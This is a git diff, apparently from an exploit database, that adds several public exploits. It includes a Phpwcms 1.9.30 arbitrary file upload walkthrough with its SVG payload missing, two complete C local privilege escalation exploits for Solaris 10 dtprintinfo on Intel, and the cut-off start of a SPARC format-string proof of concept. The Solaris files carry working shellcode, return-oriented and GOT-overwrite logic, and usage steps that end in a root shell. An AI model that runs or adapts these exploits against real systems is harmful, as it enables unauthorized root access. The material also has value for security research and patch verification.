+ 8bbK44pPnBAqzN49pSuwmgdhgsZavkNI
+
+
+ Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)
+
+
+ false
+
+
+ test
+
+
+ https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png
+
+
+
+ Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)
+
+
+
+
+
+
+
+- Replace the username with one with higher privileges (like admin)
+
+- Submit the request
+
+- Successful exploitation
\ No newline at end of file
diff --git a/exploits/php/webapps/50363.txt b/exploits/php/webapps/50363.txt
new file mode 100644
index 000000000..d5127787e
--- /dev/null
+++ b/exploits/php/webapps/50363.txt
@@ -0,0 +1,35 @@
+# Exploit Title: Phpwcms 1.9.30 - Arbitrary File Upload
+# Date: 30/9/2021
+# Exploit Author: Okan Kurtulus | okankurtulus.com.tr
+# Software Link: http://www.phpwcms.org/
+# Version: 1.9.30
+# Tested on: Ubuntu 16.04
+
+Steps:
+
+1-) You need to login to the system.
+http://target.com/phpwcms/login.php
+
+2-) Creating payload with SVG extension: payload.svg
+
+
+
+
+
+
+
+
+3-) Go to the following link and upload the payload:
+http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8
+
+From the menu:
+
+file -> multiple file upload -> Select files or drop here
+
+4-) After uploading payload, call it from the link below.
+
+http://192.168.1.112/phpwcms/upload/
\ No newline at end of file
diff --git a/exploits/solaris/local/49514.c b/exploits/solaris/local/49514.c
new file mode 100644
index 000000000..d5a4c0ed8
--- /dev/null
+++ b/exploits/solaris/local/49514.c
@@ -0,0 +1,356 @@
+# Exploit Title: Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation (2)
+# Date: 2021-02-01
+# Exploit Author: Marco Ivaldi
+# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
+# Version: Solaris 10
+# Tested on: Solaris 10 1/13 Intel
+
+
+/*
+ * raptor_dtprintcheckdir_intel.c - Solaris/Intel 0day? LPE
+ * Copyright (c) 2020 Marco Ivaldi
+ *
+ * "What we do in life echoes in eternity" -- Maximus Decimus Meridius
+ * https://patchfriday.com/22/
+ *
+ * Another buffer overflow in the dtprintinfo(1) CDE Print Viewer, leading to
+ * local root. This one was discovered by Marti Guasch Jimenez, who attended my
+ * talk "A bug's life: story of a Solaris 0day" presented at #INFILTRATE19 on
+ * May 2nd, 2019 (https://github.com/0xdea/raptor_infiltrate19).
+ *
+ * It's a stack-based buffer overflow in the check_dir() function:
+ * void __0FJcheck_dirPcTBPPP6QStatusLineStructPii(...){
+ * char local_724 [300];
+ * ...
+ * __format = getenv("REQ_DIR");
+ * sprintf(local_724,__format,param_2);
+ *
+ * "To trigger this vulnerability we need a printer present, we can also fake
+ * it with the lpstat trick. We also need at least one directory in the path
+ * pointed by the environment variable TMP_DIR. Finally, we just need to set
+ * REQ_DIR with a value of 0x720 of padding + value to overwrite EBP + value to
+ * overwrite EIP." -- Marti Guasch Jimenez
+ *
+ * This bug was likely fixed during the general cleanup of CDE code done by
+ * Oracle in response to my recently reported vulnerabilities. However, I can't
+ * confirm this because I have no access to their patches:/
+ *
+ * Usage:
+ * $ gcc raptor_dtprintcheckdir_intel.c -o raptor_dtprintcheckdir_intel -Wall
+ * [on your xserver: disable the access control]
+ * $ ./raptor_dtprintcheckdir_intel 192.168.1.1:0
+ * [on your xserver: double click on the fake "fnord" printer]
+ * [...]
+ * # id
+ * uid=0(root) gid=1(other)
+ * #
+ *
+ * Tested on:
+ * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
+ * [previous Solaris versions are also likely vulnerable]
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define INFO1 "raptor_dtprintcheckdir_intel.c - Solaris/Intel 0day? LPE"
+#define INFO2 "Copyright (c) 2020 Marco Ivaldi "
+
+#define VULN "/usr/dt/bin/dtprintinfo" // the vulnerable program
+#define BUFSIZE 2048 // size of the evil env var
+
+char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
+/* double setuid() */
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+/* execve() */
+"\x31\xc0\x50\x68/ksh\x68/bin"
+"\x89\xe3\x50\x53\x89\xe2\x50"
+"\x52\x53\xb0\x3b\x50\xcd\x91";
+
+/* globals */
+char *arg[2] = {"foo", NULL};
+char *env[256];
+int env_pos = 0, env_len = 0;
+
+/* prototypes */
+int add_env(char *string);
+void check_zero(int addr, char *pattern);
+int get_sc_addr(char *path, char **argv);
+int search_ldso(char *sym);
+int search_rwx_mem(void);
+void set_val(char *buf, int pos, int val);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+ char buf[BUFSIZE];
+ char platform[256], release[256], display[256];
+ int i, sc_addr;
+
+ int sb = ((int)argv[0] | 0xfff); /* stack base */
+ int ret = search_ldso("strcpy"); /* or sprintf */
+ int rwx_mem = search_rwx_mem(); /* rwx memory */
+
+ /* lpstat code to add a fake printer */
+ if (!strcmp(argv[0], "lpstat")) {
+
+ /* check command line */
+ if (argc != 2)
+ exit(1);
+
+ /* print the expected output and exit */
+ if(!strcmp(argv[1], "-v")) {
+ fprintf(stderr, "lpstat called with -v\n");
+ printf("device for fnord: /dev/null\n");
+ } else {
+ fprintf(stderr, "lpstat called with -d\n");
+ printf("system default destination: fnord\n");
+ }
+ exit(0);
+ }
+
+ /* helper program that prints argv[0] address, used by get_sc_addr() */
+ if (!strcmp(argv[0], "foo")) {
+ printf("0x%p\n", argv[0]);
+ exit(0);
+ }
+
+ /* print exploit information */
+ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+ /* process command line */
+ if (argc != 2) {
+ fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
+ exit(1);
+ }
+ sprintf(display, "DISPLAY=%s", argv[1]);
+
+ /* prepare the evil env var */
+ memset(buf, 'A', sizeof(buf));
+ buf[sizeof(buf) - 1] = 0x0;
+ memcpy(buf, "REQ_DIR=", 8);
+
+ /* fill the envp, keeping padding */
+ add_env(sc);
+ add_env(buf);
+ add_env(display);
+ add_env("TMP_DIR=/tmp");
+ add_env("PATH=.:/usr/bin");
+ add_env("HOME=/tmp");
+ add_env(NULL);
+
+ /* calculate the shellcode address */
+ sc_addr = get_sc_addr(VULN, argv);
+
+ /* fill with ld.so.1 address, saved eip, and arguments */
+ for (i = 12; i < BUFSIZE - 20; i += 4) {
+ set_val(buf, i, ret); /* strcpy */
+ set_val(buf, i += 4, rwx_mem); /* saved eip */
+ set_val(buf, i += 4, rwx_mem); /* 1st argument */
+ set_val(buf, i += 4, sc_addr); /* 2nd argument */
+ }
+
+ /* we need at least one directory inside TMP_DIR to trigger the bug */
+ mkdir("/tmp/one_dir", S_IRWXU | S_IRWXG | S_IRWXO);
+
+ /* create a symlink for the fake lpstat */
+ unlink("lpstat");
+ symlink(argv[0], "lpstat");
+
+ /* print some output */
+ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+ sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+ fprintf(stderr, "Using SI_PLATFORM\t: %s (%s)\n", platform, release);
+ fprintf(stderr, "Using stack base\t: 0x%p\n", (void *)sb);
+ fprintf(stderr, "Using rwx_mem address\t: 0x%p\n", (void *)rwx_mem);
+ fprintf(stderr, "Using sc address\t: 0x%p\n", (void *)sc_addr);
+ fprintf(stderr, "Using strcpy() address\t: 0x%p\n\n", (void *)ret);
+
+ /* check for null bytes */
+ check_zero(sc_addr, "sc address");
+
+ /* run the vulnerable program */
+ execve(VULN, arg, env);
+ perror("execve");
+ exit(1);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+ int i;
+
+ /* null termination */
+ if (!string) {
+ env[env_pos] = NULL;
+ return env_len;
+ }
+
+ /* add the variable to envp */
+ env[env_pos] = string;
+ env_len += strlen(string) + 1;
+ env_pos++;
+
+ /* pad the envp using zeroes */
+ if ((strlen(string) + 1) % 4)
+ for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+ env[env_pos] = string + strlen(string);
+ env_len++;
+ }
+
+ return env_len;
+}
+
+/*
+ * check_zero(): check an address for the presence of a 0x00
+ */
+void check_zero(int addr, char *pattern)
+{
+ if (!(addr & 0xff) || !(addr & 0xff00) || !(addr & 0xff0000) ||
+ !(addr & 0xff000000)) {
+ fprintf(stderr, "Error: %s contains a 0x00!\n", pattern);
+ exit(1);
+ }
+}
+
+/*
+ * get_sc_addr(): get shellcode address using a helper program
+ */
+int get_sc_addr(char *path, char **argv)
+{
+ char prog[] = "./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
+ char hex[11] = "\x00";
+ int fd[2], addr;
+
+ /* truncate program name at correct length and create a hard link */
+ prog[strlen(path)] = 0x0;
+ unlink(prog);
+ link(argv[0], prog);
+
+ /* open pipe to read program output */
+ if (pipe(fd) < 0) {
+ perror("pipe");
+ exit(1);
+ }
+
+ switch(fork()) {
+
+ case -1: /* cannot fork */
+ perror("fork");
+ exit(1);
+
+ case 0: /* child */
+ dup2(fd[1], 1);
+ close(fd[0]);
+ close(fd[1]);
+ execve(prog, arg, env);
+ perror("execve");
+ exit(1);
+
+ default: /* parent */
+ close(fd[1]);
+ read(fd[0], hex, sizeof(hex));
+ break;
+ }
+
+ /* check and return address */
+ if (!(addr = (int)strtoul(hex, (char **)NULL, 0))) {
+ fprintf(stderr, "error: cannot read sc address from helper program\n");
+ exit(1);
+ }
+ return addr;
+}
+
+/*
+ * search_ldso(): search for a symbol inside ld.so.1
+ */
+int search_ldso(char *sym)
+{
+ int addr;
+ void *handle;
+ Link_map *lm;
+
+ /* open the executable object file */
+ if ((handle = dlmopen(LM_ID_LDSO, NULL, RTLD_LAZY)) == NULL) {
+ perror("dlopen");
+ exit(1);
+ }
+
+ /* get dynamic load information */
+ if ((dlinfo(handle, RTLD_DI_LINKMAP, &lm)) == -1) {
+ perror("dlinfo");
+ exit(1);
+ }
+
+ /* search for the address of the symbol */
+ if ((addr = (int)dlsym(handle, sym)) == NULL) {
+ fprintf(stderr, "sorry, function %s() not found\n", sym);
+ exit(1);
+ }
+
+ /* close the executable object file */
+ dlclose(handle);
+
+ check_zero(addr - 4, sym);
+ return addr;
+}
+
+/*
+ * search_rwx_mem(): search for an RWX memory segment valid for all
+ * programs (typically, /usr/lib/ld.so.1) using the proc filesystem
+ */
+int search_rwx_mem(void)
+{
+ int fd;
+ char tmp[16];
+ prmap_t map;
+ int addr = 0, addr_old;
+
+ /* open the proc filesystem */
+ sprintf(tmp,"/proc/%d/map", (int)getpid());
+ if ((fd = open(tmp, O_RDONLY)) < 0) {
+ fprintf(stderr, "can't open %s\n", tmp);
+ exit(1);
+ }
+
+ /* search for the last RWX memory segment before stack (last - 1) */
+ while (read(fd, &map, sizeof(map)))
+ if (map.pr_vaddr)
+ if (map.pr_mflags & (MA_READ | MA_WRITE | MA_EXEC)) {
+ addr_old = addr;
+ addr = map.pr_vaddr;
+ }
+ close(fd);
+
+ /* add 4 to the exact address null bytes */
+ if (!(addr_old & 0xff))
+ addr_old |= 0x04;
+ if (!(addr_old & 0xff00))
+ addr_old |= 0x0400;
+
+ return addr_old;
+}
+
+/*
+ * set_val(): copy a dword inside a buffer (little endian)
+ */
+void set_val(char *buf, int pos, int val)
+{
+ buf[pos] = (val & 0x000000ff);
+ buf[pos + 1] = (val & 0x0000ff00) >> 8;
+ buf[pos + 2] = (val & 0x00ff0000) >> 16;
+ buf[pos + 3] = (val & 0xff000000) >> 24;
+}
\ No newline at end of file
diff --git a/exploits/solaris/local/49515.c b/exploits/solaris/local/49515.c
new file mode 100644
index 000000000..3d03fabaf
--- /dev/null
+++ b/exploits/solaris/local/49515.c
@@ -0,0 +1,279 @@
+# Exploit Title: Solaris 10 1/13 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)
+# Date: 2021-02-01
+# Exploit Author: Marco Ivaldi
+# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
+# Version: Solaris 10
+# Tested on: Solaris 10 1/13 Intel
+
+/*
+ * raptor_dtprintcheckdir_intel2.c - Solaris/Intel FMT LPE
+ * Copyright (c) 2020 Marco Ivaldi
+ *
+ * "I'm gonna have to go into hardcore hacking mode!" -- Hackerman
+ * https://youtu.be/KEkrWRHCDQU
+ *
+ * Same code snippet, different vulnerability. 20 years later, format string
+ * bugs are not extinct after all! The vulnerable function looks like this:
+ *
+ * void __0FJcheck_dirPcTBPPP6QStatusLineStructPii(...)
+ * {
+ * ...
+ * char local_724 [300];
+ * ...
+ * else {
+ * __format = getenv("REQ_DIR");
+ * sprintf(local_724,__format,param_2); // [1]
+ * }
+ * ...
+ * local_c = strlen(local_724); // [2]
+ * sprintf(local_5f8,"/var/spool/lp/tmp/%s/",param_2); // [3]
+ * ...
+ * }
+ *
+ * The plan (inspired by an old technique devised by gera) is to exploit the
+ * sprintf at [1], where we control the format string, to replace the strlen
+ * at [2] with a strdup and the sprintf at [3] with a call to the shellcode
+ * dynamically allocated in the heap by strdup and pointed to by the local_c
+ * variable at [2]. In practice, to pull this off the structure of the evil
+ * environment variable REQ_DIR must be:
+ * [sc] [pad] [.got/strlen] [.got/sprintf] [stackpop] [W .plt/strdup] [W call *-0x8(%ebp)]
+ *
+ * To collect the needed addresses for your system, use:
+ * $ objdump -R /usr/dt/bin/dtprintinfo | grep strlen # .got
+ * 080994cc R_386_JUMP_SLOT strlen
+ * $ objdump -R /usr/dt/bin/dtprintinfo | grep sprintf # .got
+ * 080994e4 R_386_JUMP_SLOT sprintf
+ * $ objdump -x /usr/dt/bin/dtprintinfo | grep strdup # .plt
+ * 0805df20 F *UND* 00000000 strdup
+ * $ objdump -d /usr/dt/bin/dtprintinfo | grep call | grep ebp | grep -- -0x8 # .text
+ * 08067f52: ff 55 f8 call *-0x8(%ebp)
+ *
+ * This bug was likely fixed during the general cleanup of CDE code done by
+ * Oracle in response to my recently reported vulnerabilities. However, I can't
+ * confirm this because I have no access to their patches:/
+ *
+ * See also:
+ * raptor_dtprintcheckdir_intel.c (vulnerability found by Marti Guasch Jimenez)
+ * raptor_dtprintcheckdir_sparc.c (just a proof of concept)
+ * raptor_dtprintcheckdir_sparc2.c (the real deal)
+ *
+ * Usage:
+ * $ gcc raptor_dtprintcheckdir_intel2.c -o raptor_dtprintcheckdir_intel2 -Wall
+ * [on your xserver: disable the access control]
+ * $ ./raptor_dtprintcheckdir_intel2 192.168.1.1:0
+ * [on your xserver: double click on the fake "fnord" printer]
+ * [...]
+ * # id
+ * uid=0(root) gid=1(other)
+ * #
+ *
+ * Tested on:
+ * SunOS 5.10 Generic_147148-26 i86pc i386 i86pc (Solaris 10 1/13)
+ * [previous Solaris versions are also likely vulnerable]
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define INFO1 "raptor_dtprintcheckdir_intel2.c - Solaris/Intel FMT LPE"
+#define INFO2 "Copyright (c) 2020 Marco Ivaldi "
+
+#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program
+#define BUFSIZE 300 // size of evil env var
+#define STACKPOPSEQ "%.8x" // stackpop sequence
+#define STACKPOPS 14 // number of stackpops
+
+/* replace with valid addresses for your system */
+#define STRLEN 0x080994cc // .got strlen address
+#define SPRINTF 0x080994e4 // .got sprintf address
+#define STRDUP 0x0805df20 // .plt strdup address
+#define RET 0x08067f52 // call *-0x8(%ebp) address
+
+/* split an address in 4 bytes */
+#define SPLITB(b1, b2, b3, b4, addr) { \
+ b1 = (addr & 0x000000ff); \
+ b2 = (addr & 0x0000ff00) >> 8; \
+ b3 = (addr & 0x00ff0000) >> 16; \
+ b4 = (addr & 0xff000000) >> 24; \
+}
+
+char sc[] = /* Solaris/x86 shellcode (8 + 8 + 27 = 43 bytes) */
+/* double setuid() */
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+"\x31\xc0\x50\x50\xb0\x17\xcd\x91"
+/* execve() */
+"\x31\xc0\x50\x68/ksh\x68/bin"
+"\x89\xe3\x50\x53\x89\xe2\x50"
+"\x52\x53\xb0\x3b\x50\xcd\x91";
+
+/* globals */
+char *arg[2] = {"foo", NULL};
+char *env[256];
+int env_pos = 0, env_len = 0;
+
+/* prototypes */
+int add_env(char *string);
+
+/*
+ * main()
+ */
+int main(int argc, char **argv)
+{
+ char buf[BUFSIZE], *p = buf;
+ char platform[256], release[256], display[256];
+
+ int i, stackpops = STACKPOPS;
+ unsigned base, n1, n2, n3, n4, n5, n6, n7, n8;
+ unsigned char strdup1, strdup2, strdup3, strdup4;
+ unsigned char ret1, ret2, ret3, ret4;
+
+ int strlen_got = STRLEN;
+ int sprintf_got = SPRINTF;
+ int strdup_plt = STRDUP;
+ int ret = RET;
+
+ /* lpstat code to add a fake printer */
+ if (!strcmp(argv[0], "lpstat")) {
+
+ /* check command line */
+ if (argc != 2)
+ exit(1);
+
+ /* print the expected output and exit */
+ if(!strcmp(argv[1], "-v")) {
+ fprintf(stderr, "lpstat called with -v\n");
+ printf("device for fnord: /dev/null\n");
+ } else {
+ fprintf(stderr, "lpstat called with -d\n");
+ printf("system default destination: fnord\n");
+ }
+ exit(0);
+ }
+
+ /* print exploit information */
+ fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
+
+ /* process command line */
+ if (argc != 2) {
+ fprintf(stderr, "usage: %s xserver:display\n\n", argv[0]);
+ exit(1);
+ }
+ sprintf(display, "DISPLAY=%s", argv[1]);
+
+ /* evil env var: name + shellcode + padding */
+ bzero(buf, BUFSIZE);
+ sprintf(buf, "REQ_DIR=%s#", sc);
+ p += strlen(buf);
+
+ /* format string: .got strlen address */
+ *((void **)p) = (void *)(strlen_got); p += 4;
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(strlen_got + 1); p += 4;
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(strlen_got + 2); p += 4;
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(strlen_got + 3); p += 4;
+ memset(p, 'A', 4); p += 4; /* dummy */
+
+ /* format string: .got sprintf address */
+ *((void **)p) = (void *)(sprintf_got); p += 4;
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(sprintf_got + 1); p += 4;
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(sprintf_got + 2); p += 4;
+ memset(p, 'A', 4); p += 4; /* dummy */
+ *((void **)p) = (void *)(sprintf_got + 3); p += 4;
+
+ /* format string: stackpop sequence */
+ base = strlen(buf) - strlen("REQ_DIR=");
+ for (i = 0; i < stackpops; i++, p += strlen(STACKPOPSEQ), base += 8)
+ strcat(p, STACKPOPSEQ);
+
+ /* calculate numeric arguments for .plt strdup address */
+ SPLITB(strdup1, strdup2, strdup3, strdup4, strdup_plt);
+ n1 = (strdup1 - base) % 0x100;
+ n2 = (strdup2 - base - n1) % 0x100;
+ n3 = (strdup3 - base - n1 - n2) % 0x100;
+ n4 = (strdup4 - base - n1 - n2 - n3) % 0x100;
+
+ /* calculate numeric arguments for call *-0x8(%ebp) address */
+ SPLITB(ret1, ret2, ret3, ret4, ret);
+ n5 = (ret1 - base - n1 - n2 - n3 - n4) % 0x100;
+ n6 = (ret2 - base - n1 - n2 - n3 - n4 - n5) % 0x100;
+ n7 = (ret3 - base - n1 - n2 - n3 - n4 - n5 - n6) % 0x100;
+ n8 = (ret4 - base - n1 - n2 - n3 - n4 - n5 - n6 - n7) % 0x100;
+
+ /* check for potentially dangerous numeric arguments below 10 */
+ n1 += (n1 < 10) ? (0x100) : (0);
+ n2 += (n2 < 10) ? (0x100) : (0);
+ n3 += (n3 < 10) ? (0x100) : (0);
+ n4 += (n4 < 10) ? (0x100) : (0);
+ n5 += (n5 < 10) ? (0x100) : (0);
+ n6 += (n6 < 10) ? (0x100) : (0);
+ n7 += (n7 < 10) ? (0x100) : (0);
+ n8 += (n8 < 10) ? (0x100) : (0);
+
+ /* format string: write string */
+ sprintf(p, "%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n%%%dx%%n", n1, n2, n3, n4, n5, n6, n7, n8);
+
+ /* fill the envp, keeping padding */
+ add_env(buf);
+ add_env(display);
+ add_env("TMP_DIR=/tmp");
+ add_env("PATH=.:/usr/bin");
+ add_env("HOME=/tmp");
+ add_env(NULL);
+
+ /* we need at least one directory inside TMP_DIR to trigger the bug */
+ mkdir("/tmp/one_dir", S_IRWXU | S_IRWXG | S_IRWXO);
+
+ /* create a symlink for the fake lpstat */
+ unlink("lpstat");
+ symlink(argv[0], "lpstat");
+
+ /* print some output */
+ sysinfo(SI_PLATFORM, platform, sizeof(platform) - 1);
+ sysinfo(SI_RELEASE, release, sizeof(release) - 1);
+ fprintf(stderr, "Using SI_PLATFORM\t\t: %s (%s)\n", platform, release);
+ fprintf(stderr, "Using strlen address in .got\t: 0x%p\n", (void *)strlen_got);
+ fprintf(stderr, "Using sprintf address in .got\t: 0x%p\n", (void *)sprintf_got);
+ fprintf(stderr, "Using strdup address in .plt\t: 0x%p\n", (void *)strdup_plt);
+ fprintf(stderr, "Using call *-0x8(%%ebp) address\t: 0x%p\n\n", (void *)ret);
+
+ /* run the vulnerable program */
+ execve(VULN, arg, env);
+ perror("execve");
+ exit(1);
+}
+
+/*
+ * add_env(): add a variable to envp and pad if needed
+ */
+int add_env(char *string)
+{
+ int i;
+
+ /* null termination */
+ if (!string) {
+ env[env_pos] = NULL;
+ return env_len;
+ }
+
+ /* add the variable to envp */
+ env[env_pos] = string;
+ env_len += strlen(string) + 1;
+ env_pos++;
+
+ /* pad the envp using zeroes */
+ if ((strlen(string) + 1) % 4)
+ for (i = 0; i < (4 - ((strlen(string)+1)%4)); i++, env_pos++) {
+ env[env_pos] = string + strlen(string);
+ env_len++;
+ }
+
+ return env_len;
+}
\ No newline at end of file
diff --git a/exploits/solaris/local/49516.c b/exploits/solaris/local/49516.c
new file mode 100644
index 000000000..315151edd
--- /dev/null
+++ b/exploits/solaris/local/49516.c
@@ -0,0 +1,549 @@
+# Exploit Title: Solaris 10 1/13 (SPARC) - 'dtprintinfo' Local Privilege Escalation
+# Date: 2021-02-01
+# Exploit Author: Marco Ivaldi
+# Vendor Homepage: https://www.oracle.com/solaris/solaris10/
+# Version: Solaris 10
+# Tested on: Solaris 10 1/13 SPARC
+
+/*
+ * raptor_dtprintcheckdir_sparc.c - Solaris/SPARC FMT PoC
+ * Copyright (c) 2020 Marco Ivaldi
+ *
+ * "Mimimimimimimi
+ * Mimimi only mimi
+ * Mimimimimimimi
+ * Mimimi sexy mi"
+ * -- Serebro
+ *
+ * As usual, exploitation on SPARC turned out to be much more complicated (and
+ * fun) than on Intel. Since the vulnerable program needs to survive one
+ * additional function before we can hijack %pc, the classic stack-based buffer
+ * overflow approach didn't seem feasible in this case. Therefore, I opted for
+ * the format string bug. This is just a proof of concept, 'cause guess what --
+ * on my system it works only when gdb or truss are attached to the target
+ * process:( To borrow Neel Mehta's words:
+ *
+ * "It's quite common to find an exploit that only works with GDB attached to
+ * the process, simply because without the debugger, break register windows
+ * aren't flushed to the stack and the overwrite has no effect."
+ * -- The Shellcoder's Handbook
+ *
+ * On different hardware configurations this exploit might work if the correct
+ * retloc and offset are provided. It might also be possible to force a context
+ * switch at the right time that results in registers being flushed to the
+ * stack at the right moment. However, this method tends to be unreliable even
+ * when the attack is repeatable like in this case. A better way to solve the
+ * puzzle would be to overwrite something different, e.g.:
+ *
+ * - Activation records of other functions, such as check_dir() (same issues)
+ * - Callback to function SortJobs() (nope, address is hardcoded in .text)
+ * - PLT in the binary (I need a different technique to handle null bytes)
+ * - PLT (R_SPARC_JMP_SLOT) in libc (no null bytes, this looks promising!)
+ * - Other OS function pointers I'm not aware of still present in Solaris 10
+ *
+ * Finally, it might be possible to combine the stack-based buffer overflow and
+ * the format string bug to surgically fix addresses and survive until needed
+ * for program flow hijacking to be possible. Bottom line: there's still some
+ * work to do to obtain a reliable exploit, but I think it's feasible. You're
+ * welcome to try yourself if you feel up to the task and have a spare SPARC
+ * box;) [spoiler alert: I did it myself, see raptor_dtprintcheckdir_sparc2.c]
+ *
+ * This bug was likely fixed during the general cleanup of CDE code done by
+ * Oracle in response to my recently reported vulnerabilities. However, I can't
+ * confirm this because I have no access to their patches:/
+ *
+ * See also:
+ * raptor_dtprintcheckdir_intel.c (vulnerability found by Marti Guasch Jimenez)
+ * raptor_dtprintcheckdir_intel2.c
+ * raptor_dtprintcheckdir_sparc2.c (the real deal)
+ *
+ * Usage:
+ * $ gcc raptor_dtprintcheckdir_sparc.c -o raptor_dtprintcheckdir_sparc -Wall
+ * [on your xserver: disable the access control]
+ * $ truss -u a.out -u '*' -fae ./raptor_dtprintcheckdir_sparc 192.168.1.1:0
+ * [on your xserver: double click on the fake "fnord" printer]
+ * ...
+ * -> __0FJcheck_dirPcTBPPP6QStatusLineStructPii(0xfe584e58, 0xff2a4042, 0x65db0, 0xffbfc50c)
+ * -> libc:getenv(0x4e8f8, 0x0, 0x0, 0x0)
+ * <- libc:getenv() = 0xffbff364
+ * -> libc:getenv(0x4e900, 0x1, 0xf9130, 0x0)
+ * <- libc:getenv() = 0xffbff364
+ * -> libc:sprintf(0xffbfc1bc, 0xffbff364, 0xff2a4042, 0x0)
+ * ...
+ * setuid(0) = 0
+ * chmod("/bin/ksh", 037777777777) = 0
+ * _exit(0)
+ * $ ksh
+ * # id
+ * uid=100(user) gid=1(other) euid=0(root) egid=2(bin)
+ * #
+ *
+ * Tested on:
+ * SunOS 5.10 Generic_Virtual sun4u sparc SUNW,SPARC-Enterprise
+ * [previous Solaris versions are also likely vulnerable (and easier to exploit)]
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define INFO1 "raptor_dtprintcheckdir_sparc.c - Solaris/SPARC FMT PoC"
+#define INFO2 "Copyright (c) 2020 Marco Ivaldi "
+
+#define VULN "/usr/dt/bin/dtprintinfo" // vulnerable program
+#define BUFSIZE 3000 // size of evil env var
+#define BUFSIZE2 10000 // size of padding buf
+#define STACKPOPSEQ "%.8x" // stackpop sequence
+#define STACKPOPS 383 // number of stackpops
+
+/* default retloc and offset for sprintf() */
+#define RETLOC 0xffbfbb3c // saved ret location
+#define OFFSET 84 // offset from retloc to i0loc
+
+/* default retloc and offset for check_dir() */
+/* TODO: patch %i6 that gets corrupted by overflow */
+//#define RETLOC 0xffbfbbac // default saved ret location
+//#define OFFSET 1884 // default offset from retloc to i0loc
+
+/* split an address in 4 bytes */
+#define SPLITB(B1, B2, B3, B4, ADDR) { \
+ B4 = (ADDR & 0x000000ff); \
+ B3 = (ADDR & 0x0000ff00) >> 8; \
+ B2 = (ADDR & 0x00ff0000) >> 16; \
+ B1 = (ADDR & 0xff000000) >> 24; \
+}
+
+/* calculate numeric arguments for write string */
+#define CALCARGS(N1, N2, N3, N4, B1, B2, B3, B4, BASE) { \
+ N1 = (B4 - BASE) % 0x100; \
+ N2 = (B2 - BASE - N1) % 0x100; \
+ N3 = (B1 - BASE - N1 - N2) % 0x100; \
+ N4 = (B3 - BASE - N1 - N2 - N3) % 0x100; \
+ BASE += N1 + N2 + N3 + N4; \
+}
+
+//#define USE_EXEC_SC // uncomment to use exec shellcode
+
+#ifdef USE_EXEC_SC
+ char sc[] = /* Solaris/SPARC execve() shellcode (12 + 48 = 60 bytes) */
+ /* setuid(0) */
+ "\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
+ "\x82\x10\x20\x17" /* mov 0x17, %g1 */
+ "\x91\xd0\x20\x08" /* ta 8 */
+ /* execve("/bin/ksh", argv, NULL) */
+ "\x9f\x41\x40\x01" /* rd %pc,%o7 ! >= sparcv8+ */
+ "\x90\x03\xe0\x28" /* add %o7, 0x28, %o0 */
+ "\x92\x02\x20\x10" /* add %o0, 0x10, %o1 */
+ "\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
+ "\xd0\x22\x20\x10" /* st %o0, [ %o0 + 0x10 ] */
+ "\xc0\x22\x20\x14" /* clr [ %o0 + 0x14 ] */
+ "\x82\x10\x20\x0b" /* mov 0xb, %g1 */
+ "\x91\xd0\x20\x08" /* ta 8 */
+ "\x80\x1c\x40\x11" /* xor %l1, %l1, %g0 ! nop */
+ "\x41\x41\x41\x41" /* placeholder */
+ "/bin/ksh";
+#else
+ char sc[] = /* Solaris/SPARC chmod() shellcode (12 + 32 + 20 = 64 bytes) */
+ /* setuid(0) */
+ "\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
+ "\x82\x10\x20\x17" /* mov 0x17, %g1 */
+ "\x91\xd0\x20\x08" /* ta 8 */
+ /* chmod("/bin/ksh", 037777777777) */
+ "\x92\x20\x20\x01" /* sub %g0, 1, %o1 */
+ "\x20\xbf\xff\xff" /* bn,a */
+ "\x20\xbf\xff\xff" /* bn,a */
+ "\x7f\xff\xff\xff" /* call */
+ "\x90\x03\xe0\x20" /* add %o7, 0x20, %o0 */
+ "\xc0\x22\x20\x08" /* clr [ %o0 + 8 ] */
+ "\x82\x10\x20\x0f" /* mov 0xf, %g1 */
+ "\x91\xd0\x20\x08" /* ta 8 */
+ /* exit(0) */
+ "\x90\x08\x3f\xff" /* and %g0, -1, %o0 */
+ "\x82\x10\x20\x01" /* mov 1, %g1 */
+ "\x91\xd0\x20\x08" /* ta 8 */
+ "/bin/ksh";
+#endif /* USE_EXEC_SC */
+
